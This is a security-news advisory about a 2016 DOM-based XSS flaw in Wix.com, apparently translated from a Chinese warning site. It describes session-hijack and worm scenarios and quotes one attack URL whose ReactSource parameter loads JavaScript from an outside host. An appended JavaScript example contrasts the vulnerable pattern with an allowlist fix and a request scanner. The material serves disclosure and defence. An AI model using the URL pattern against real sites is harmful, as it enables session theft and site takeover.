Wix.com delays fixing vulnerability, millions of websites at risk - Vulnerability Early Warning - The Black Bar Safety Net

ID MYHACK58:62201680895
Type myhack58
Reporter Anonymous
Modified 2016-11-05T00:00:00


Foreword

Wix.com, a cloud web hosting provider, has a DOM-based XSS vulnerability that could let an attacker take control of any site hosted on the platform. Matt Austin, a senior security researcher at Contrast Security, said: "All it takes is adding a single parameter to a site created on Wix, and the attacker can get their malicious JavaScript loaded on that website." Austin said that although he had reported the vulnerability to Wix back in October, as of this Wednesday it still had not been fixed, and Wix.com had not replied to the report. According to Wix.com's own figures, the platform has a total of 86 million users.

According to OWASP, this vulnerability differs from traditional XSS, where the payload is stored in the HTTP(S) response page: in DOM-based XSS, client-side script modifies the Document Object Model (DOM) environment in the user's browser, and the malicious code affects how the client-side code executes.

Scenario analysis

Austin analysed two attack scenarios for this reflected DOM-based XSS vulnerability. In the first, the owner of a Wix site is induced to click a malicious URL. That URL loads carefully constructed JavaScript that hijacks the victim's browser session information; the attacker can then take over the victim's browser session and perform any action as the original user. The attacker could modify the Wix site the victim controls, for example granting a third party site-administrator rights, or compromise a Wix e-commerce site to steal credit card numbers. Austin said that with administrator control of a Wix.com site, one can distribute malware that creates a dynamic, distributed, browser-based botnet to steal online currency, control the website's content and exploit its users.

In the second scenario Austin described, a carefully constructed URL lures a user to a Wix website. Through the DOM-based XSS attack, the URL loads JavaScript into the target Wix.com website. In some situations, by way of the browser's session information, a Wix.com fan site could be modified so that a music download is replaced with a malware download, or so that PayPal payments are redirected to a third-party account.

In the DOM XSS case, all the attacker needs to do is host malicious JavaScript on a server and point a URL at it, for example: "http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com". In this example, the additional "?ReactSource=http://m-austin.com" appended after the root address "http://matt4592.wixsite.com/music" is what creates the conditions for the DOM-based XSS payload.

Postscript

Contrast Security said that, worse, cyber-criminals could use this flaw to expand the attack, turning it into a worm that spreads across all Wix websites, similar to the infamous 2005 Samy worm on MySpace, which was built to propagate across the entire social networking site. Austin said the lesson is that taking over the millions of websites hosted on Wix would in fact not take very long.
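As an added illustration of the parameter-driven DOM XSS pattern described above, and of how a defender closes it (this is example code written for this page, not code from the advisory, from Wix or from Contrast Security): the first function shows a page trusting a ReactSource query value as a script URL unchecked, the second replaces it with a strict origin allowlist, and the third scans constructed request URLs for overrides pointing outside that allowlist. The allowlist origin static.example-cdn.invalid, the default script path, the sample request list and all function names are assumptions.

```javascript
// Added example; not Wix's code. Runs under Node (uses the WHATWG URL class).

// Hypothetical allowlist: the only origin the page may load React from.
const TRUSTED_SCRIPT_ORIGINS = new Set(["https://static.example-cdn.invalid"]);

// Vulnerable pattern: the query value is returned as-is, so whatever origin
// the URL carries (the constructed attack URL above uses m-austin.com)
// would become a <script src> on the page.
function vulnerableScriptSource(pageUrl) {
  return new URL(pageUrl).searchParams.get("ReactSource");
}

// Hardened pattern: resolve the value against the page URL, require https and
// an allowlisted origin, and otherwise ignore the parameter entirely and use
// the bundled default. Malformed values are treated the same as absent ones.
function safeScriptSource(pageUrl, defaultSrc) {
  const raw = new URL(pageUrl).searchParams.get("ReactSource");
  if (raw === null) return defaultSrc;
  let candidate;
  try {
    candidate = new URL(raw, pageUrl); // relative values resolve to the page origin
  } catch (e) {
    return defaultSrc;
  }
  if (candidate.protocol !== "https:") return defaultSrc; // also rejects javascript:
  if (!TRUSTED_SCRIPT_ORIGINS.has(candidate.origin)) return defaultSrc;
  return candidate.href;
}

// Constructed request URLs, as a proxy or WAF might log them (not real traffic).
const SAMPLE_REQUEST_URLS = [
  "http://matt4592.wixsite.com/music",
  "http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com",
  "http://matt4592.wixsite.com/music?ReactSource=https://static.example-cdn.invalid/react.js",
];

// Defender-side triage: return the requests whose ReactSource points outside
// the allowlist (or cannot be parsed). Those are the ones worth investigating.
function findExternalScriptOverrides(urls) {
  return urls.filter((u) => {
    const raw = new URL(u).searchParams.get("ReactSource");
    if (raw === null) return false;
    try {
      return !TRUSTED_SCRIPT_ORIGINS.has(new URL(raw, u).origin);
    } catch (e) {
      return true;
    }
  });
}

// Stand-alone run: show what each pattern would load and what the scan flags.
const attackUrl = SAMPLE_REQUEST_URLS[1];
console.log("vulnerable loads:", vulnerableScriptSource(attackUrl));
console.log("hardened loads:  ", safeScriptSource(attackUrl, "https://static.example-cdn.invalid/react.js"));
console.log("flagged requests:", findExternalScriptOverrides(SAMPLE_REQUEST_URLS));
```

The allowlist compares whole origins (scheme, host and port), not substrings, so a value such as "https://static.example-cdn.invalid.m-austin.com" or a path-only trick does not pass; combining this with a Content-Security-Policy script-src restricted to the same origins gives a second, browser-enforced layer if the page-level check is ever bypassed.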